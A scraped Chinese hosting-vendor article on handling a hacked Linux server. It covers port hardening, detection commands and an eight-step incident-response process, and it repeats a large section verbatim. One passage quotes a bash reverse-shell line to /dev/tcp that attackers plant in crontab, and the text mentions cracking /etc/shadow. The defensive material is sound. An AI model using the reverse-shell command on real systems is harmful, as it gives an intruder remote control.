【內(nèi)容聲明】本文收集整理于互聯(lián)網(wǎng),不確保內(nèi)容真實(shí)性和質(zhì)量度,僅供參考!若有服務(wù)器產(chǎn)品相關(guān)問題,請咨詢[YINGSOO]在線客服,獲取專業(yè)解答!

　　【推薦產(chǎn)品】防DDOS服務(wù)器丨法國物理服務(wù)器丨加拿大云服務(wù)器丨美國高防低價服務(wù)器

　　【精選文章】海外云主機(jī)服務(wù)提供商是做什么的？ 丨國外高防服務(wù)器租用要注意哪些問題？

　　服務(wù)器被攻擊了怎么處理？關(guān)于服務(wù)器被人攻擊的處理，當(dāng)然先要分兩種情況，如果是大規(guī)模DDos搶注攻擊的話，一般對付辦法不多，根本辦法是通過運(yùn)營商做流量清洗，分布式部署系統(tǒng)分流。用一些基于公有云的防護(hù)手段(費(fèi)錢，效果一般般)，一些安全公司昂貴的設(shè)備(作用也不大，有錢就可以多買)。

　　一般性防護(hù)手段

　　一般性防護(hù)手段，通過硬防或者軟防火墻比如iptables，主要要限制服務(wù)器端口訪問，除了必須的80，443以外其他端口一律不對外開放。

　　關(guān)于對外開放端口限制和檢測的訪問，我的原創(chuàng)文章都提過幾篇介紹過：

　　「安全掃描」看好你的大門，企業(yè)安全端口掃描實(shí)踐

　　基本上就是在外面掃描你服務(wù)器ip，看都開了那些端口，對不該開放端口開放的話就封禁掉。主要對外開放的危險端口有 所有udp端口(比如最近大規(guī)模針對github的攻擊，就用對外開放的memcache udp 11211 udp端口進(jìn)行的反射式攻擊)，tcp重點(diǎn)關(guān)注端口： 21(ftp)，22(ssh) 23(telnet)，2181(zookeeper)，3306(mysql)，6379(redis)，8161和61616(mq)，11211(memcache)，27017/27018(mongodb)，9200(elasticsearch)還有其他的根據(jù)企業(yè)部署情況來增加。

　　在服務(wù)上查看開放的監(jiān)聽端口情況使用命令：

　　netstat -ntualp

　　Local地址 類似于 0.0.0.0:3306和 :::22的監(jiān)聽的服務(wù)器就要重點(diǎn)關(guān)注，一般除了web都不應(yīng)該對外開放。

　　對web服務(wù)：

　　1、注意升級所用程序的版本，有漏洞的要及時升級(比如dedecms，struts2的漏洞等)，部署的時候注意權(quán)限設(shè)置，不給多余的權(quán)限。

　　2、部署必要的waf系統(tǒng)，安利下筆者有個開源免費(fèi)的waf，有需要的可以聯(lián)系我。服務(wù)器被攻擊了怎么處理

　　3、部署時候精良先通過CDN或者自己用nginx返鄉(xiāng)代理來對用戶，不直接把php 應(yīng)用、tomcat應(yīng)用服務(wù)器對外，這樣即可以提高訪問效率，增加訪問并發(fā)，還可以低于短期大流量訪問的沖擊。

　　如果服務(wù)器被人攻擊，掛馬了，怎么排除和解決

　　常見異常情況：異常的流量、異常tcp鏈接(來源端口，往外發(fā)的端口)、異常的訪問日志(大量的ip頻繁的訪問個別文件)。

　　如果部署了監(jiān)控系統(tǒng)的話(強(qiáng)烈建議部署zabbix，并增加對系統(tǒng)添加專門安全items)，可以方便通過zabbix監(jiān)控圖和趨勢對比了解這些信息：

　　利用last，lastb發(fā)現(xiàn)異常的用戶登錄情況，ip來源。

　　利用lastlog，/var/log/message，/var/log/secure,日志等，是否權(quán)限已經(jīng)被攻陷。

　　用history 發(fā)現(xiàn)shell執(zhí)行情況信息。

　　用top，ps，pstree等發(fā)現(xiàn)異常進(jìn)程和服務(wù)器負(fù)載等情況。

　　用netstat -natlp發(fā)現(xiàn)異常進(jìn)程情況。用w命令發(fā)現(xiàn)當(dāng)前系統(tǒng)登錄用戶的情況。

　　如果發(fā)現(xiàn)異常用戶，立即修改用戶密碼，pkill -kill -t tty 剔除異常用戶。然后進(jìn)行進(jìn)一步處理。

　　發(fā)現(xiàn)異常進(jìn)程，立即禁止，凍結(jié)禁止。

　　發(fā)現(xiàn)一個惡意進(jìn)程后通過 ls -al /proc/Pid (Pid為具體的進(jìn)程號)，發(fā)現(xiàn)進(jìn)程的啟動路徑，啟動的文件所在目錄等信息。

　　如果發(fā)現(xiàn)異常連接數(shù)，通過iptables封禁相關(guān)端口或者ip

　　iptables -I INPUT -s ip -j DROP

　　iptables -I OUTPUT -p tcp --dport 25 -j DROP

　　iptables -I INPUT -p tcp --dport 25 -j DROP

　　對清理移動木馬，殺掉進(jìn)程

　　首先清理掉木馬創(chuàng)建的cron 計劃項(xiàng)和啟動項(xiàng)。

　　ls -al /etc/proc/Pid/ 找的惡意木馬文件。

　　惡意進(jìn)程的執(zhí)行目錄和文件

　　最后用一條命令 kill -9 所有的進(jìn)程ID && rm -rf 所有涉及的文件和目錄。

　　更多信息可以關(guān)注筆者的文章或者咨詢筆者：

　　遇到服務(wù)器被黑，很多人會采用拔網(wǎng)線、封 iptables 或者關(guān)掉所有服務(wù)的方式應(yīng)急，但如果是線上服務(wù)器就不能立即采用任何影響業(yè)務(wù)的手段了，需要根據(jù)服務(wù)器業(yè)務(wù)情況分類處理。

　　下面我們看一個標(biāo)準(zhǔn)的服務(wù)器安全應(yīng)急影響應(yīng)該怎么做，也算是小蟻網(wǎng)絡(luò)從事安全事件應(yīng)急多年以來的一些經(jīng)驗(yàn)之談，

　　圖 1：處理思路

　　如上圖，將服務(wù)器安全應(yīng)急響應(yīng)流程分為如下 8 個環(huán)節(jié)：

　　發(fā)現(xiàn)安全事件(核實(shí))

　　現(xiàn)場保護(hù)

　　服務(wù)器保護(hù)

　　影響范圍評估

　　在線分析

　　數(shù)據(jù)備份

　　深入分析

　　事件報告整理YINGSOO：maisonbaluchon.cn

　　接下來我們將每個環(huán)節(jié)分解，看看需要如何斷開異常連接、排查入侵源頭、避免二次入侵等。

　　核實(shí)信息(運(yùn)維/安全人員)

　　根據(jù)安全事件通知源的不同，分為兩種：

　　外界通知：和報告人核實(shí)信息，確認(rèn)服務(wù)器/系統(tǒng)是否被入侵。現(xiàn)在很多企業(yè)有自己的 SRC(安全響應(yīng)中心)，在此之前更多的是依賴某云。這種情況入侵的核實(shí)一般是安全工程師完成。

　　自行發(fā)現(xiàn)：根據(jù)服務(wù)器的異?；蚬收吓袛?，比如對外發(fā)送大規(guī)模流量或者系統(tǒng)負(fù)載異常高等，這種情況一般是運(yùn)維工程師發(fā)現(xiàn)并核實(shí)的。

　　現(xiàn)場保護(hù)(運(yùn)維)服務(wù)器被攻擊了怎么處理

　　我們很多人看過大陸的電視劇《重案六組》，每次接到刑事案件，刑警們第一時間就是封鎖現(xiàn)場、保存現(xiàn)場原狀。

　　同樣道理，安全事件發(fā)生現(xiàn)場，跟刑事案件發(fā)生現(xiàn)場一樣，需要保存第一現(xiàn)場重要信息，方便后面入侵檢測和取證。

　　保存現(xiàn)場環(huán)境(截圖)

　　相關(guān)信息采集命令如下：

　　進(jìn)程信息：ps axu

　　網(wǎng)絡(luò)信息：netstat –a

　　網(wǎng)絡(luò)+進(jìn)程：lsof / netstat -p

　　攻擊者登陸情況(截圖)

　　相關(guān)信息采集命令如下：

　　查看當(dāng)前登錄用戶：w 或 who -a

　　服務(wù)器保護(hù)(運(yùn)維/機(jī)房)

　　這里的現(xiàn)場保護(hù)和服務(wù)器保護(hù)是兩個不同的環(huán)節(jié)，前者注重取證，后者注重環(huán)境隔離。

　　核實(shí)機(jī)器被入侵后，應(yīng)當(dāng)盡快將機(jī)器保護(hù)起來，避免被二次入侵或者當(dāng)成跳板擴(kuò)大攻擊面。

　　此時，為保護(hù)服務(wù)器和業(yè)務(wù)，避免服務(wù)器被攻擊者繼續(xù)利用，應(yīng)盡快遷移業(yè)務(wù)，立即下線機(jī)器。

　　如果不能立即處理，應(yīng)當(dāng)通過配置網(wǎng)絡(luò) ACL 等方式，封掉該服務(wù)器對網(wǎng)絡(luò)的雙向連接。

　　影響范圍評估(運(yùn)維/開發(fā))

　　一般是運(yùn)維或者程序確認(rèn)影響范圍，需要運(yùn)維通過日志或者監(jiān)控圖表確認(rèn)數(shù)據(jù)庫或者敏感文件是否泄露，如果是代碼或者數(shù)據(jù)庫泄露了，則需要程序評估危害情況與處置方法。

　　影響訪問評估一般從下面幾點(diǎn)來入手：

　　具體業(yè)務(wù)架構(gòu)：Web(PHP/Java， WebServer)， Proxy， DB等。

　　IP 及所處區(qū)域拓?fù)涞龋篤LAN 內(nèi)服務(wù)器和應(yīng)用情況。

　　確定同一網(wǎng)絡(luò)下面服務(wù)器之間的訪問：可以互相登陸，是否需要 Key 或者是密碼登錄。

　　由此確定檢查影響范圍，確認(rèn)所有受到影響的網(wǎng)段和機(jī)器。

　　在線分析(安全人員/運(yùn)維)

　　這時需要根據(jù)個人經(jīng)驗(yàn)快速在線分析，一般是安全人員和運(yùn)維同時在線處理，不過會涉及多人協(xié)作的問題，需要避免多人操作機(jī)器時破壞服務(wù)器現(xiàn)場，造成分析困擾。

　　之前澳創(chuàng)遇到一個類似的問題，就是運(yùn)維排查時敲錯了 iptables 的命令，將 iptables -L 敲成 iptables -i 導(dǎo)致 iptables-save 時出現(xiàn)異常記錄，結(jié)果安全人員上來檢查時就被這條記錄迷惑了，導(dǎo)致處理思路受到一定干擾。

　　所有用戶 History 日志檢測

　　關(guān)鍵字：wget/curl， gcc， 或者隱藏文件， 敏感文件后綴(.c，.py，conf， .pl， .sh)。

　　檢查是否存在異常用戶。

　　檢查最近添加的用戶，是否有不知名用戶或不規(guī)范提權(quán)。

　　找出 root 權(quán)限的用戶。

　　可以執(zhí)行以下命令檢查：

　　grep -v -E ^# /etc/passwd | awk -F： '$3 == 0 { print $1}'

　　反連木馬判斷

　　netstat –a

　　注意非正常端口的外網(wǎng) IP

　　可疑進(jìn)程判斷

　　判斷是否為木馬 ps –aux

　　重點(diǎn)關(guān)注文件(隱藏文件)， Python腳本，Perl腳本，Shell 腳本(bash/sh/zsh)。

　　使用 which，whereis，find 定位。

　　Crontab 檢測

　　不要用 crontab –l 查看 crontab(繞過檢測)，也有通過寫 crontab 配置文件反彈Shell 的，澳創(chuàng)接觸過幾次，一般都是使用的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1。

　　系統(tǒng)日志檢測

　　檢查 sshd 服務(wù)配置文件 /etc/ssh/sshd_config 和系統(tǒng)認(rèn)證日志 auth、message，判斷是否為口令破解攻擊。

　　/etc/ssh/sshd_config 文件確認(rèn)認(rèn)證方式。

　　確認(rèn)日志是否被刪除或者清理過的可能(大小判斷)。

　　last/lastb 可以作為輔助，不過可能不準(zhǔn)確。服務(wù)器被攻擊了怎么處理

　　NHIDS 正常運(yùn)行判斷

　　是否安裝：ls /etc/ossec

　　是否運(yùn)行正常：ps axu |grep nhids，三個 nhids 進(jìn)程則表示正常

　　其他攻擊分析

　　抓取網(wǎng)絡(luò)數(shù)據(jù)包并進(jìn)行分析，判斷是否為拒絕服務(wù)攻擊，這里需要注意，一定要使用 -w 參數(shù)，這樣才能保存成 pcap 格式導(dǎo)入到 wireshark，這樣分析起來會事半功倍。

　　tcpdump -w tcpdump.log

　　安全相關(guān)的關(guān)鍵文件和數(shù)據(jù)備份(運(yùn)維)

　　可以同步進(jìn)行，使用 sftp/rsync 等將日志上傳到安全的服務(wù)器：

　　打包系統(tǒng)日志：參考：$ tar -jcvf syslog.tar.bz2 /var/log

　　打包 Web 日志：access log

　　打包 History 日志(所有用戶)，參考：$ cp /home/user/，history user_history

　　打包 crontab 記錄

　　打包密碼文件：/etc/passwd， /etc/shadow

　　打包可疑文件、后門、Shell 信息

　　深入分析(安全人員)

　　初步鎖定異常進(jìn)程和惡意代碼后，將受影響范圍梳理清楚，封禁了入侵者對機(jī)器的控制后，接下來需要深入排查入侵原因。一般可以從 Webshell、開放端口服務(wù)等方向順藤摸瓜。

　　Webshell 入侵 服務(wù)器被攻擊了怎么處理

　　使用 Webshell_check.py 腳本檢測 Web 目錄：

　　$ python webshell_check.py /var/www/ >result.txt

　　查找 Web 目錄下所有 nobody 的文件，人工分析：

　　$ find /var/www –user nobody >nobody.txt

　　如果能確定入侵時間，可以使用 find 查找最近時間段內(nèi)變化的文件：

　　$ find / -ctime/-mtime 8

　　利用 Web 漏洞直接反連 Shell

　　分析 access.log：

　　縮小日志范圍：時間，異常 IP 提取。

　　攻擊行為提?。撼Ｒ姷墓?exp 識別。

　　系統(tǒng)弱口令入侵

　　認(rèn)證相關(guān)日志 auth/syslog/message 排查：

　　爆破行為定位和 IP 提取。

　　爆破是否成功確定：有爆破行為 IP 是否有 accept 記錄。

　　如果日志已經(jīng)被清理，使用工具(比如John the Ripper)爆破 /etc/passwd，/etc/shadow。

　　其他入侵

　　其他服務(wù)器跳板到本機(jī)。

　　后續(xù)行為分析

　　History 日志：提權(quán)、增加后門，以及是否被清理。

　　Sniffer：網(wǎng)卡混雜模式檢測 ifconfig |grep –i proc。

　　內(nèi)網(wǎng)掃描：網(wǎng)絡(luò) nmap/ 掃描器，socks5 代理。

　　確定是否有 rootkit：rkhunter， chkrootkit， ps/netstat 替換確認(rèn)。

　　后門清理排查

　　根據(jù)時間點(diǎn)做關(guān)聯(lián)分析：查找那個時間段的所有文件。

　　一些小技巧：/tmp 目錄， ls –la，查看所有文件，注意隱藏的文件。

　　根據(jù)用戶做時間關(guān)聯(lián)：比如 nobody。

　　其他機(jī)器的關(guān)聯(lián)操作

　　其他機(jī)器和這臺機(jī)器的網(wǎng)絡(luò)連接 (日志查看)、相同業(yè)務(wù)情況(同樣業(yè)務(wù)，負(fù)載均衡)。

　　整理事件報告(安全人員)

　　事件報告應(yīng)包含但不限于以下幾個點(diǎn)：

　　分析事件發(fā)生原因：事件為什么會發(fā)生的原因。

　　分析整個攻擊流程：時間點(diǎn)、操作。

　　分析事件處理過程：整個事件處理過程總結(jié)是否有不足。

　　分析事件預(yù)防：如何避免事情再次發(fā)生。

　　總結(jié)：總結(jié)事件原因，改進(jìn)處理過程，預(yù)防類似事件再次發(fā)生。

　　處理中遇到的比較棘手的事情

　　日志和操作記錄全被刪了，怎么辦?

　　strace 查看 losf 進(jìn)程，再嘗試恢復(fù)一下日志記錄，不行的話鏡像硬盤數(shù)據(jù)慢慢查。這個要用到一些取證工具了，dd 硬盤數(shù)據(jù)再去還原出來。

　　系統(tǒng)賬號密碼都修改了，登不進(jìn)去?

　　重啟進(jìn)單用戶模式修改 root 密碼，或者通過控制卡操作，或者直接還原系統(tǒng)，都搞不定就直接重裝吧。

　　使用常見的入侵檢測命令未發(fā)現(xiàn)異常進(jìn)程，但是機(jī)器在對外發(fā)包，這是怎么回事?

　　這種情況下很可能常用的系統(tǒng)命令已經(jīng)被攻擊者或者木馬程序替換，可以通過 md5sum 對比本機(jī)二進(jìn)制文件與正常機(jī)器的 md5 值是否一致。

　　如果發(fā)現(xiàn)不一致，肯定是被替換了，可以從其他機(jī)器上拷貝命令到本機(jī)替換，或者 alias 為其他名稱，避免為惡意程序再次替換。

　　被 getshell 怎么辦?

　　漏洞修復(fù)前，系統(tǒng)立即下線，用內(nèi)網(wǎng)環(huán)境訪問。

　　上傳點(diǎn)放到內(nèi)網(wǎng)訪問，不允許外網(wǎng)有類似的上傳點(diǎn)，有上傳點(diǎn)，而且沒有校驗(yàn)文件類型很容易上傳 Webshell。

　　被 getshell 的服務(wù)器中是否有敏感文件和數(shù)據(jù)庫，如果有請檢查是否有泄漏。

　　hosts 文件中對應(yīng)的 host 關(guān)系需要重新配置，攻擊者可以配置 hosts 來訪問測試環(huán)境。

　　重裝系統(tǒng)。

　　案例分析

　　上面講了很多思路的東西，相信大家更想看看實(shí)際案例，下面介紹兩個案例。

　　案例 1

　　一個別人處理的案例，基本處理過程如下：

　　通過外部端口掃描收集開放端口信息，然后獲取到反彈 Shell 信息，登陸機(jī)器發(fā)現(xiàn)關(guān)鍵命令已經(jīng)被替換，后面查看 History 記錄，發(fā)現(xiàn)疑似木馬文件，通過簡單逆向和進(jìn)程查看發(fā)現(xiàn)了異常進(jìn)程，從而鎖定了入侵原因。

　　遇到服務(wù)器被黑，很多人會采用拔網(wǎng)線、封 iptables 或者關(guān)掉所有服務(wù)的方式應(yīng)急，但如果是線上服務(wù)器就不能立即采用任何影響業(yè)務(wù)的手段了，需要根據(jù)服務(wù)器業(yè)務(wù)情況分類處理。

　　下面我們看一個標(biāo)準(zhǔn)的服務(wù)器安全應(yīng)急影響應(yīng)該怎么做，也算是小蟻網(wǎng)絡(luò)從事安全事件應(yīng)急多年以來的一些經(jīng)驗(yàn)之談，

　　圖 1：處理思路

　　如上圖，將服務(wù)器安全應(yīng)急響應(yīng)流程分為如下 8 個環(huán)節(jié)：

　　發(fā)現(xiàn)安全事件(核實(shí))

　　現(xiàn)場保護(hù)

　　服務(wù)器保護(hù)

　　影響范圍評估

　　在線分析

　　數(shù)據(jù)備份

　　深入分析

　　事件報告整理

　　接下來我們將每個環(huán)節(jié)分解，看看需要如何斷開異常連接、排查入侵源頭、避免二次入侵等。

　　核實(shí)信息(運(yùn)維/安全人員)

　　根據(jù)安全事件通知源的不同，分為兩種：

　　外界通知：和報告人核實(shí)信息，確認(rèn)服務(wù)器/系統(tǒng)是否被入侵?，F(xiàn)在很多企業(yè)有自己的 SRC(安全響應(yīng)中心)，在此之前更多的是依賴某云。這種情況入侵的核實(shí)一般是安全工程師完成。

　　自行發(fā)現(xiàn)：根據(jù)服務(wù)器的異?；蚬收吓袛?，比如對外發(fā)送大規(guī)模流量或者系統(tǒng)負(fù)載異常高等，這種情況一般是運(yùn)維工程師發(fā)現(xiàn)并核實(shí)的。

　　關(guān)鍵詞：服務(wù)器被攻擊了怎么處理,服務(wù)器被攻擊了

　　YINGSOO曾被評為IDC行業(yè)優(yōu)選服務(wù)商，是一家專業(yè)提供香港服務(wù)器、香港云服務(wù)器、香港高防服務(wù)器租用、美國服務(wù)器、美國云服務(wù)器等境外服務(wù)器租用托管服務(wù)的IDC廠商。全國統(tǒng)一服務(wù)熱線：400-630-3752

　　香港主機(jī)套餐,快速穩(wěn)定,選知名品牌YINGSOO

　　Yingsoo香港主機(jī)套餐采用CN2電信直連香港,速度延遲低至10ms,快速,安全,穩(wěn)定,免備案9年運(yùn)營經(jīng)驗(yàn), 服務(wù)超過1200家企業(yè)客戶,連續(xù)9年香港主機(jī)套餐銷量持續(xù)增長

　　http://maisonbaluchon.cn/products/cloud-hk.html

　　YINGSOO日本獨(dú)享主機(jī)租用3天免費(fèi)試用,海外云主機(jī)品牌

　　好網(wǎng)絡(luò),不怕曬!日本獨(dú)享主機(jī)租用免費(fèi)試用,獨(dú)享控制面板,海外云服務(wù)品牌2019年日本獨(dú)享主機(jī)租用銷量再度破表,1200家企業(yè)共同選擇,高達(dá)95%的續(xù)約率

　　http://maisonbaluchon.cn/products/cloud-jp.html

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。